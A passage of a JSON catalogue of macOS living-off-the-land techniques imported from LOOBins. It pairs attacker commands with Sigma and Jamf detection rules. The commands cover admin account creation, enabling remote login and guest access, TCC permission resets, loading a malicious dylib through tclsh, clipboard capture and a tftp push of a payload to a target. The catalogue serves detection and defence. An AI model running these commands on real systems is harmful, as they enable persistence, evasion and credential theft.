-admin", 6650 "description": "sysadminctl can be used to create a local admin account", 6651 "mitre": [], 6652 "fullPath": [ 6653 "/usr/sbin/sysadminctl" 6654 ], 6655 "environment": [ 6656 "Local host" 6657 ], 6658 "availability": "Built in", 6659 "verification": "Upstream reference", 6660 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 6661 "detection": [ 6662 { 6663 "type": "Sigma: Creation Of A Local User Account", 6664 "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_create_account.yml" 6665 }, 6666 { 6667 "type": "Sigma: User Added To Admin Group Via Sysadminctl", 6668 "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_sysadminctl_add_user_to_admin_group.yml" 6669 }, 6670 { 6671 "type": "Sigma: Guest Account Enabled Via Sysadminctl", 6672 "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_sysadminctl_enable_guest_account.yml" 6673 } 6674 ], 6675 "references": [ 6676 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/sysadminctl.yml", 6677 "https://ss64.com/mac/sysadminctl.html" 6678 ] 6679 }, 6680 { 6681 "id": "loobins:sysadminctl:f4e8242891928d05", 6682 "toolId": "loobins:sysadminctl", 6683 "toolName": "sysadminctl", 6684 "name": "Reset user password", 6685 "source": "LOOBins", 6686 "platform": [ 6687 "macOS" 6688 ], 6689 "capability": [ 6690 "Persistence" 6691 ], 6692 "nativeCategory": [ 6693 "Persistence" 6694 ], 6695 "command": "sudo sysadminctl -resetPasswordFor randomUser -newPassword \"randomPassword\"", 6696 "description": "sysadminctl can be used to reset password for a particular user account", 6697 "mitre": [], 6698 "fullPath": [ 6699 "/usr/sbin/sysadminctl" 6700 ], 6701 "environment": [ 6702 "Local host" 6703 ], 6704 "availability": "Built in", 6705 "verification": "Upstream reference", 6706 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 6707 "detection": [ 6708 { 6709 "type": "Sigma: Creation Of A Local User Account", 6710 "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_create_account.yml" 6711 }, 6712 { 6713 "type": "Sigma: User Added To Admin Group Via Sysadminctl", 6714 "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_sysadminctl_add_user_to_admin_group.yml" 6715 }, 6716 { 6717 "type": "Sigma: Guest Account Enabled Via Sysadminctl", 6718 "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_sysadminctl_enable_guest_account.yml" 6719 } 6720 ], 6721 "references": [ 6722 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/sysadminctl.yml", 6723 "https://ss64.com/mac/sysadminctl.html" 6724 ] 6725 }, 6726 { 6727 "id": "loobins:sysadminctl:27d8e96a6674435a", 6728 "toolId": "loobins:sysadminctl", 6729 "toolName": "sysadminctl", 6730 "name": "Delete a local account", 6731 "source": "LOOBins", 6732 "platform": [ 6733 "macOS" 6734 ], 6735 "capability": [], 6736 "nativeCategory": [ 6737 "Impact" 6738 ], 6739 "command": "sudo sysadminctl -deleteUser randomUser", 6740 "description": "sysadminctl can delete the specified user account", 6741 "mitre": [], 6742 "fullPath": [ 6743 "/usr/sbin/sysadminctl" 6744 ], 6745 "environment": [ 6746 "Local host" 6747 ], 6748 "availability": "Built in", 6749 "verification": "Upstream reference", 6750 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 6751 "detection": [ 6752 { 6753 "type": "Sigma: Creation Of A Local User Account", 6754 "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_create_account.yml" 6755 }, 6756 { 6757 "type": "Sigma: User Added To Admin Group Via Sysadminctl", 6758 "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_sysadminctl_add_user_to_admin_group.yml" 6759 }, 6760 { 6761 "type": "Sigma: Guest Account Enabled Via Sysadminctl", 6762 "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_sysadminctl_enable_guest_account.yml" 6763 } 6764 ], 6765 "references": [ 6766 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/sysadminctl.yml", 6767 "https://ss64.com/mac/sysadminctl.html" 6768 ] 6769 }, 6770 { 6771 "id": "loobins:sysadminctl:22d7cd044623e281", 6772 "toolId": "loobins:sysadminctl", 6773 "toolName": "sysadminctl", 6774 "name": "Enable SMB Guest Access", 6775 "source": "LOOBins", 6776 "platform": [ 6777 "macOS" 6778 ], 6779 "capability": [], 6780 "nativeCategory": [ 6781 "Exfiltration" 6782 ], 6783 "command": "sudo sysadminctl -smbGuestAccess on", 6784 "description": "sysadminctl can enable SMB Guest Access", 6785 "mitre": [], 6786 "fullPath": [ 6787 "/usr/sbin/sysadminctl" 6788 ], 6789 "environment": [ 6790 "Local host" 6791 ], 6792 "availability": "Built in", 6793 "verification": "Upstream reference", 6794 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 6795 "detection": [ 6796 { 6797 "type": "Sigma: Creation Of A Local User Account", 6798 "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_create_account.yml" 6799 }, 6800 { 6801 "type": "Sigma: User Added To Admin Group Via Sysadminctl", 6802 "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_sysadminctl_add_user_to_admin_group.yml" 6803 }, 6804 { 6805 "type": "Sigma: Guest Account Enabled Via Sysadminctl", 6806 "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_sysadminctl_enable_guest_account.yml" 6807 } 6808 ], 6809 "references": [ 6810 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/sysadminctl.yml", 6811 "https://ss64.com/mac/sysadminctl.html" 6812 ] 6813 }, 6814 { 6815 "id": "loobins:sysadminctl:871ffb7fecbb33cb", 6816 "toolId": "loobins:sysadminctl", 6817 "toolName": "sysadminctl", 6818 "name": "Enable AFP Guest Access", 6819 "source": "LOOBins", 6820 "platform": [ 6821 "macOS" 6822 ], 6823 "capability": [], 6824 "nativeCategory": [ 6825 "Exfiltration" 6826 ], 6827 "command": "sudo sysadminctl -afpGuestAccess on", 6828 "description": "sysadminctl can enable AFP Guest Access", 6829 "mitre": [], 6830 "fullPath": [ 6831 "/usr/sbin/sysadminctl" 6832 ], 6833 "environment": [ 6834 "Local host" 6835 ], 6836 "availability": "Built in", 6837 "verification": "Upstream reference", 6838 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 6839 "detection": [ 6840 { 6841 "type": "Sigma: Creation Of A Local User Account", 6842 "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_create_account.yml" 6843 }, 6844 { 6845 "type": "Sigma: User Added To Admin Group Via Sysadminctl", 6846 "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_sysadminctl_add_user_to_admin_group.yml" 6847 }, 6848 { 6849 "type": "Sigma: Guest Account Enabled Via Sysadminctl", 6850 "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_sysadminctl_enable_guest_account.yml" 6851 } 6852 ], 6853 "references": [ 6854 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/sysadminctl.yml", 6855 "https://ss64.com/mac/sysadminctl.html" 6856 ] 6857 }, 6858 { 6859 "id": "loobins:sysctl:4c999f9f530dbf76", 6860 "toolId": "loobins:sysctl", 6861 "toolName": "sysctl", 6862 "name": "Use sysctl to gather macOS hardware info.", 6863 "source": "LOOBins", 6864 "platform": [ 6865 "macOS" 6866 ], 6867 "capability": [ 6868 "Discovery" 6869 ], 6870 "nativeCategory": [ 6871 "Discovery" 6872 ], 6873 "command": "sysctl -n hw.model", 6874 "description": "sysctl can be used to gather interesting macOS host data, including hardware information, memory size, logical cpu information, etc.", 6875 "mitre": [], 6876 "fullPath": [ 6877 "/usr/sbin/sysctl" 6878 ], 6879 "environment": [ 6880 "Local host" 6881 ], 6882 "availability": "Built in", 6883 "verification": "Upstream reference", 6884 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 6885 "detection": [ 6886 { 6887 "type": "Jamf Protect: Detect activity related to sysctl in an interactive shell", 6888 "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/sysctl_activity" 6889 } 6890 ], 6891 "references": [ 6892 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/sysctl.yml", 6893 "https://evasions.checkpoint.com/src/MacOS/macos.html" 6894 ] 6895 }, 6896 { 6897 "id": "loobins:system_profiler:94bcdf5d6eceb23d", 6898 "toolId": "loobins:system_profiler", 6899 "toolName": "system_profiler", 6900 "name": "Listing the available datatypes", 6901 "source": "LOOBins", 6902 "platform": [ 6903 "macOS" 6904 ], 6905 "capability": [ 6906 "Discovery" 6907 ], 6908 "nativeCategory": [ 6909 "Discovery" 6910 ], 6911 "command": "system_profiler -listDataTypes", 6912 "description": "List all available sub-systems to get information from.", 6913 "mitre": [], 6914 "fullPath": [ 6915 "/usr/sbin/system_profiler" 6916 ], 6917 "environment": [ 6918 "Local host" 6919 ], 6920 "availability": "Built in", 6921 "verification": "Upstream reference", 6922 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 6923 "detection": [ 6924 { 6925 "type": "System Information Discovery Using System_Profiler", 6926 "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_system_profiler_discovery.yml" 6927 }, 6928 { 6929 "type": "Jamf Protect: Detect system_profiler activity that gathers system information", 6930 "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/system_profiler_activity" 6931 } 6932 ], 6933 "references": [ 6934 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/system_profiler.yml", 6935 "https://macosbin.com/bin/system_profiler", 6936 "https://ss64.com/osx/system_profiler.html" 6937 ] 6938 }, 6939 { 6940 "id": "loobins:system_profiler:280ec67aa6e4fde6", 6941 "toolId": "loobins:system_profiler", 6942 "toolName": "system_profiler", 6943 "name": "Print hardware information", 6944 "source": "LOOBins", 6945 "platform": [ 6946 "macOS" 6947 ], 6948 "capability": [ 6949 "Discovery" 6950 ], 6951 "nativeCategory": [ 6952 "Discovery" 6953 ], 6954 "command": "system_profiler SPHardwareDataType", 6955 "description": "Prints an overview of the hardware of the current machine, including its model name and serial number.", 6956 "mitre": [], 6957 "fullPath": [ 6958 "/usr/sbin/system_profiler" 6959 ], 6960 "environment": [ 6961 "Local host" 6962 ], 6963 "availability": "Built in", 6964 "verification": "Upstream reference", 6965 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 6966 "detection": [ 6967 { 6968 "type": "System Information Discovery Using System_Profiler", 6969 "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_system_profiler_discovery.yml" 6970 }, 6971 { 6972 "type": "Jamf Protect: Detect system_profiler activity that gathers system information", 6973 "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/system_profiler_activity" 6974 } 6975 ], 6976 "references": [ 6977 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/system_profiler.yml", 6978 "https://macosbin.com/bin/system_profiler", 6979 "https://ss64.com/osx/system_profiler.html" 6980 ] 6981 }, 6982 { 6983 "id": "loobins:system_profiler:04c45f4b68269440", 6984 "toolId": "loobins:system_profiler", 6985 "toolName": "system_profiler", 6986 "name": "Print software information", 6987 "source": "LOOBins", 6988 "platform": [ 6989 "macOS" 6990 ], 6991 "capability": [ 6992 "Discovery" 6993 ], 6994 "nativeCategory": [ 6995 "Discovery" 6996 ], 6997 "command": "system_profiler SPSoftwareDataType", 6998 "description": "Prints an overview of the software of the current machine, including the exact macOS version number.", 6999 "mitre": [], 7000 "fullPath": [ 7001 "/usr/sbin/system_profiler" 7002 ], 7003 "environment": [ 7004 "Local host" 7005 ], 7006 "availability": "Built in", 7007 "verification": "Upstream reference", 7008 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 7009 "detection": [ 7010 { 7011 "type": "System Information Discovery Using System_Profiler", 7012 "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_system_profiler_discovery.yml" 7013 }, 7014 { 7015 "type": "Jamf Protect: Detect system_profiler activity that gathers system information", 7016 "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/system_profiler_activity" 7017 } 7018 ], 7019 "references": [ 7020 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/system_profiler.yml", 7021 "https://macosbin.com/bin/system_profiler", 7022 "https://ss64.com/osx/system_profiler.html" 7023 ] 7024 }, 7025 { 7026 "id": "loobins:system_profiler:5501ae493999a365", 7027 "toolId": "loobins:system_profiler", 7028 "toolName": "system_profiler", 7029 "name": "Print the information of developer tools", 7030 "source": "LOOBins", 7031 "platform": [ 7032 "macOS" 7033 ], 7034 "capability": [ 7035 "Discovery" 7036 ], 7037 "nativeCategory": [ 7038 "Discovery" 7039 ], 7040 "command": "system_profiler SPDeveloperToolsDataType", 7041 "description": "Prints the currently active version of the Xcode developer tools and SDK.", 7042 "mitre": [], 7043 "fullPath": [ 7044 "/usr/sbin/system_profiler" 7045 ], 7046 "environment": [ 7047 "Local host" 7048 ], 7049 "availability": "Built in", 7050 "verification": "Upstream reference", 7051 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 7052 "detection": [ 7053 { 7054 "type": "System Information Discovery Using System_Profiler", 7055 "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_system_profiler_discovery.yml" 7056 }, 7057 { 7058 "type": "Jamf Protect: Detect system_profiler activity that gathers system information", 7059 "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/system_profiler_activity" 7060 } 7061 ], 7062 "references": [ 7063 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/system_profiler.yml", 7064 "https://macosbin.com/bin/system_profiler", 7065 "https://ss64.com/osx/system_profiler.html" 7066 ] 7067 }, 7068 { 7069 "id": "loobins:system_profiler:ae2eb524d89a31c7", 7070 "toolId": "loobins:system_profiler", 7071 "toolName": "system_profiler", 7072 "name": "Print power and battery information", 7073 "source": "LOOBins", 7074 "platform": [ 7075 "macOS" 7076 ], 7077 "capability": [ 7078 "Discovery" 7079 ], 7080 "nativeCategory": [ 7081 "Discovery" 7082 ], 7083 "command": "system_profiler SPPowerDataType", 7084 "description": "Prints power and battery information, including the current AC wattage and battery cycle count.", 7085 "mitre": [], 7086 "fullPath": [ 7087 "/usr/sbin/system_profiler" 7088 ], 7089 "environment": [ 7090 "Local host" 7091 ], 7092 "availability": "Built in", 7093 "verification": "Upstream reference", 7094 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 7095 "detection": [ 7096 { 7097 "type": "System Information Discovery Using System_Profiler", 7098 "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_system_profiler_discovery.yml" 7099 }, 7100 { 7101 "type": "Jamf Protect: Detect system_profiler activity that gathers system information", 7102 "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/system_profiler_activity" 7103 } 7104 ], 7105 "references": [ 7106 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/system_profiler.yml", 7107 "https://macosbin.com/bin/system_profiler", 7108 "https://ss64.com/osx/system_profiler.html" 7109 ] 7110 }, 7111 { 7112 "id": "loobins:systemsetup:92b5002344055d13", 7113 "toolId": "loobins:systemsetup", 7114 "toolName": "systemsetup", 7115 "name": "Enable Remote Login", 7116 "source": "LOOBins", 7117 "platform": [ 7118 "macOS" 7119 ], 7120 "capability": [ 7121 "Lateral Movement" 7122 ], 7123 "nativeCategory": [ 7124 "Lateral Movement" 7125 ], 7126 "command": "sudo systemsetup -setremotelogin on", 7127 "description": "systemsetup can be used to enable SSH for remote login", 7128 "mitre": [], 7129 "fullPath": [ 7130 "/usr/sbin/systemsetup" 7131 ], 7132 "environment": [ 7133 "Local host" 7134 ], 7135 "availability": "Built in", 7136 "verification": "Upstream reference", 7137 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 7138 "detection": [ 7139 { 7140 "type": "Command line argument detection containing (args contain systemsetup AND (-setremoteappleevents OR -setremotelogin) AND on)", 7141 "value": "https://www.elastic.co/guide/en/security/current/remote-ssh-login-enabled-via-systemsetup-command.html" 7142 }, 7143 { 7144 "type": "Jamf Protect: Detect systemsetup activity that enables remotelogin or appleremoteevents", 7145 "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/systemsetup_activity" 7146 } 7147 ], 7148 "references": [ 7149 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/systemsetup.yml", 7150 "https://ss64.com/osx/systemsetup.html" 7151 ] 7152 }, 7153 { 7154 "id": "loobins:systemsetup:8cf0ab2815bd3147", 7155 "toolId": "loobins:systemsetup", 7156 "toolName": "systemsetup", 7157 "name": "Enable Remote Apple Events", 7158 "source": "LOOBins", 7159 "platform": [ 7160 "macOS" 7161 ], 7162 "capability": [ 7163 "Lateral Movement" 7164 ], 7165 "nativeCategory": [ 7166 "Lateral Movement" 7167 ], 7168 "command": "sudo systemsetup -setremoteappleevents on", 7169 "description": "systemsetup can be used to enable Remote Apple Events. \nSet whether the system responds to events sent by other computers (such as AppleScripts).\n", 7170 "mitre": [], 7171 "fullPath": [ 7172 "/usr/sbin/systemsetup" 7173 ], 7174 "environment": [ 7175 "Local host" 7176 ], 7177 "availability": "Built in", 7178 "verification": "Upstream reference", 7179 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 7180 "detection": [ 7181 { 7182 "type": "Command line argument detection containing (args contain systemsetup AND (-setremoteappleevents OR -setremotelogin) AND on)", 7183 "value": "https://www.elastic.co/guide/en/security/current/remote-ssh-login-enabled-via-systemsetup-command.html" 7184 }, 7185 { 7186 "type": "Jamf Protect: Detect systemsetup activity that enables remotelogin or appleremoteevents", 7187 "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/systemsetup_activity" 7188 } 7189 ], 7190 "references": [ 7191 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/systemsetup.yml", 7192 "https://ss64.com/osx/systemsetup.html" 7193 ] 7194 }, 7195 { 7196 "id": "loobins:tccutil:a2a8e1b9b60cb400", 7197 "toolId": "loobins:tccutil", 7198 "toolName": "tccutil", 7199 "name": "Use the tccutil to reset specific permissions", 7200 "source": "LOOBins", 7201 "platform": [ 7202 "macOS" 7203 ], 7204 "capability": [ 7205 "Defense Evasion" 7206 ], 7207 "nativeCategory": [ 7208 "Defense Evasion" 7209 ], 7210 "command": "tccutil reset AppleEvents", 7211 "description": "Banshee Stealer resets the permissions that have already been allowed to applications on the system, which will cause the user to be prompted to give them again. This action may be intended to trick the user into unknowingly giving authorizations to the malware.", 7212 "mitre": [], 7213 "fullPath": [ 7214 "/usr/bin/tccutil" 7215 ], 7216 "environment": [ 7217 "Local host" 7218 ], 7219 "availability": "Built in", 7220 "verification": "Upstream reference", 7221 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 7222 "detection": [ 7223 { 7224 "type": "No detections at time of publishing", 7225 "value": "No detections at time of publishing" 7226 } 7227 ], 7228 "references": [ 7229 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/tccutil.yml", 7230 "https://ss64.com/mac/tccutil.html", 7231 "https://research.checkpoint.com/2025/banshee-macos-stealer-that-stole-code-from-macos-xprotect/" 7232 ] 7233 }, 7234 { 7235 "id": "loobins:tccutil:74f4c88c5da560ab", 7236 "toolId": "loobins:tccutil", 7237 "toolName": "tccutil", 7238 "name": "Use the tccutil to reset specific permissions for an application", 7239 "source": "LOOBins", 7240 "platform": [ 7241 "macOS" 7242 ], 7243 "capability": [ 7244 "Defense Evasion" 7245 ], 7246 "nativeCategory": [ 7247 "Defense Evasion" 7248 ], 7249 "command": "tccutil reset AppleEvents com.apple.Terminal", 7250 "description": "Attackers use tccutil to reset permissions for services like Camera, Microphone, or AppleEvents.", 7251 "mitre": [], 7252 "fullPath": [ 7253 "/usr/bin/tccutil" 7254 ], 7255 "environment": [ 7256 "Local host" 7257 ], 7258 "availability": "Built in", 7259 "verification": "Upstream reference", 7260 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 7261 "detection": [ 7262 { 7263 "type": "No detections at time of publishing", 7264 "value": "No detections at time of publishing" 7265 } 7266 ], 7267 "references": [ 7268 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/tccutil.yml", 7269 "https://ss64.com/mac/tccutil.html", 7270 "https://research.checkpoint.com/2025/banshee-macos-stealer-that-stole-code-from-macos-xprotect/" 7271 ] 7272 }, 7273 { 7274 "id": "loobins:tclsh:73ff199dee11f733", 7275 "toolId": "loobins:tclsh", 7276 "toolName": "tclsh", 7277 "name": "Execute malicious dynamic library (.dylib) from standard input", 7278 "source": "LOOBins", 7279 "platform": [ 7280 "macOS" 7281 ], 7282 "capability": [ 7283 "Execution" 7284 ], 7285 "nativeCategory": [ 7286 "Execution" 7287 ], 7288 "command": "echo \"load bad.dylib\" | tclsh", 7289 "description": "An attacker can execute a malicious .dylib from stdin by echoing a load command and piping to tclsh. This will bypass code signing requirements.", 7290 "mitre": [], 7291 "fullPath": [ 7292 "/usr/bin/tclsh" 7293 ], 7294 "environment": [ 7295 "Local host" 7296 ], 7297 "availability": "Built in", 7298 "verification": "Upstream reference", 7299 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 7300 "detection": [ 7301 { 7302 "type": "Recommendations included in resource below. No formal detection content at this time.", 7303 "value": "https://medium.com/specter-ops-posts/dylib-loads-that-tickle-your-fancy-d25196addd8c" 7304 } 7305 ], 7306 "references": [ 7307 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/tclsh.yml", 7308 "https://medium.com/specter-ops-posts/dylib-loads-that-tickle-your-fancy-d25196addd8c" 7309 ] 7310 }, 7311 { 7312 "id": "loobins:textutil:51b3787cb7533e11", 7313 "toolId": "loobins:textutil", 7314 "toolName": "textutil", 7315 "name": "Use the textutil to read several files and build a new file", 7316 "source": "LOOBins", 7317 "platform": [ 7318 "macOS" 7319 ], 7320 "capability": [ 7321 "Defense Evasion", 7322 "Collection" 7323 ], 7324 "nativeCategory": [ 7325 "Defense Evasion", 7326 "Collection" 7327 ], 7328 "command": "textutil -convert html Quote.doc secondQuote.doc", 7329 "description": "A one-liner can load the content of multiple RTF files in a directory, concatenate their contents, and write the results out as a new file. This provides two sub-use-cases; one is building a malicious file from a collection of smaller files which could evade both network and host-based security controls as the traditional means of signature-based detection would be redundant; two is concatenating the content of several, potentially sensitive files before exfiltration. This command can also be looped to iterate a directory of files.", 7330 "mitre": [], 7331 "fullPath": [ 7332 "/usr/bin/textutil" 7333 ], 7334 "environment": [ 7335 "Local host" 7336 ], 7337 "availability": "Built in", 7338 "verification": "Upstream reference", 7339 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 7340 "detection": [ 7341 { 7342 "type": "Command Line Argument Detection (args contain textutil AND (-convert OR -stdin OR pbpaste))", 7343 "value": "Command Line Argument Detection (args contain textutil AND (-convert OR -stdin OR pbpaste))" 7344 } 7345 ], 7346 "references": [ 7347 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/textutil.yml", 7348 "https://osxdaily.com/tag/textutil/" 7349 ] 7350 }, 7351 { 7352 "id": "loobins:textutil:4dc3a5da2507547e", 7353 "toolId": "loobins:textutil", 7354 "toolName": "textutil", 7355 "name": "Capture clipboard content", 7356 "source": "LOOBins", 7357 "platform": [ 7358 "macOS" 7359 ], 7360 "capability": [ 7361 "Credential Access", 7362 "Collection" 7363 ], 7364 "nativeCategory": [ 7365 "Credential Access", 7366 "Collection" 7367 ], 7368 "command": "pbpaste | textutil -stdin -info > Clipboard.txt", 7369 "description": "By leveraging another command line tool, pbpaste, it is possible to write a one-liner which captures the content of the clipboard. If an attacker already has access to the system, the attacker could run this command to obtain sensitive information such as a password and then elevate their privileges or exfiltrate the information.", 7370 "mitre": [], 7371 "fullPath": [ 7372 "/usr/bin/textutil" 7373 ], 7374 "environment": [ 7375 "Local host" 7376 ], 7377 "availability": "Built in", 7378 "verification": "Upstream reference", 7379 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 7380 "detection": [ 7381 { 7382 "type": "Command Line Argument Detection (args contain textutil AND (-convert OR -stdin OR pbpaste))", 7383 "value": "Command Line Argument Detection (args contain textutil AND (-convert OR -stdin OR pbpaste))" 7384 } 7385 ], 7386 "references": [ 7387 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/textutil.yml", 7388 "https://osxdaily.com/tag/textutil/" 7389 ] 7390 }, 7391 { 7392 "id": "loobins:tftp:7e0e23e01b3fdd09", 7393 "toolId": "loobins:tftp", 7394 "toolName": "tftp", 7395 "name": "Activate the built-in TFTP server via launchctl", 7396 "source": "LOOBins", 7397 "platform": [ 7398 "macOS" 7399 ], 7400 "capability": [ 7401 "Lateral Movement", 7402 "Persistence" 7403 ], 7404 "nativeCategory": [ 7405 "Lateral Movement", 7406 "Persistence" 7407 ], 7408 "command": "sudo launchctl load -w /System/Library/LaunchDaemons/tftp.plist\n\n# Create placeholder for each file to be received\nsudo touch /private/tftpboot/payload.sh && sudo chmod 666 /private/tftpboot/payload.sh", 7409 "description": "macOS ships with a launchd plist for tftpd at /System/Library/LaunchDaemons/tftp.plist. Loading it with launchctl starts the TFTP server on UDP port 69, serving /private/tftpboot. Requires root. A placeholder file must be created for each file to be transferred, as the default configuration does not allow tftpd to create new files.", 7410 "mitre": [], 7411 "fullPath": [ 7412 "/usr/bin/tftp", 7413 "/usr/libexec/tftpd" 7414 ], 7415 "environment": [ 7416 "Local host" 7417 ], 7418 "availability": "Built in", 7419 "verification": "Upstream reference", 7420 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 7421 "detection": [ 7422 { 7423 "type": "No detections at time of publishing", 7424 "value": "No detections at time of publishing" 7425 } 7426 ], 7427 "references": [ 7428 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/tftp.yml", 7429 "https://ss64.com/mac/tftp.html", 7430 "https://en.wikipedia.org/https://hackviser.com/tactics/pentesting/services/tftp", 7431 "https://www.stamus-networks.com/blog/uncovered-uncovering-risk-exposure-from-publicly-accessible-unauthenticated-tftp", 7432 "https://attack.mitre.org/techniques/T1105/", 7433 "https://blog.talosintelligence.com/bad-apples-weaponizing-native-macos-primitives-for-movement-and-execution/" 7434 ] 7435 }, 7436 { 7437 "id": "loobins:tftp:9714c3c02da83a7b", 7438 "toolId": "loobins:tftp", 7439 "toolName": "tftp", 7440 "name": "Transfer a file to a target using the tftp client", 7441 "source": "LOOBins", 7442 "platform": [ 7443 "macOS" 7444 ], 7445 "capability": [ 7446 "Lateral Movement" 7447 ], 7448 "nativeCategory": [ 7449 "Lateral Movement" 7450 ], 7451 "command": "tftp <TARGET_IP> << EOF\nbinary\nput /tmp/payload.sh payload.sh\nquit\nEOF", 7452 "description": "The built-in tftp client can push files to a remote TFTP server. The binary mode flag ensures files are not corrupted during transfer.", 7453 "mitre": [], 7454 "fullPath": [ 7455 "/usr/bin/tftp", 7456 "/usr/libexec/tftpd" 7457 ], 7458 "environment": [ 7459 "Local host" 7460 ], 7461 "availability": "Built in", 7462 "verification": "Upstream reference", 7463 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 7464 "detection": [ 7465 { 7466 "type": "No detections at time of publishing", 7467 "value": "No detections at time of publishing" 7468 } 7469 ], 7470 "references": [ 7471 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/tftp.yml", 7472 "https://ss64.com/mac/tftp.html", 7473 "https://en.wikipedia.org/https://hackviser.com/tactics/pentesting/services/tftp", 7474 